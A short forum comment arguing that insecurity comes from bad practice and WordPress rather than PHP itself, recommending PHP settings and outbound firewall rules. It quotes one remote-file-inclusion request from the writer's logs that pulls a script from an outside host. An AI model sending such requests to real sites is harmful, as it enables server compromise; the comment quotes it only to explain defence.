[nadams]

> DO NOT USE PHP FOR ANYTHING THAT REQUIRES SECURITY!

Using [your favorite scripting language] doesn't magically make things like SQL injection and other bad practices go away. There are ways to mitigate those issues by using frameworks in those languages - but really the issue here isn't "OMG PHP SUCKS" but rather Wordpress sucks for allowing something like this work:

> wpadmin.php?include=http://someothersite.com/some-bad-script.php

I have seen that numerous times in my logs. There are settings in PHP configuration where you can actually prevent external downloading of scripts.

However, ignoring the scripting language itself - the server itself could have mitigated behind a firewall and not allowing any outbound web browsing (obviously inbound 80 needs to be open - but there is no reason why it should be allowed to "browse" the web). Or even more limited outbound connection.

Go browse some github projects (obviously those not using a framework) by random people in different languages - you will see that given the opportunity people will still do stupid things - even if the language makes it really hard to do it - as the saying goes "life finds a way".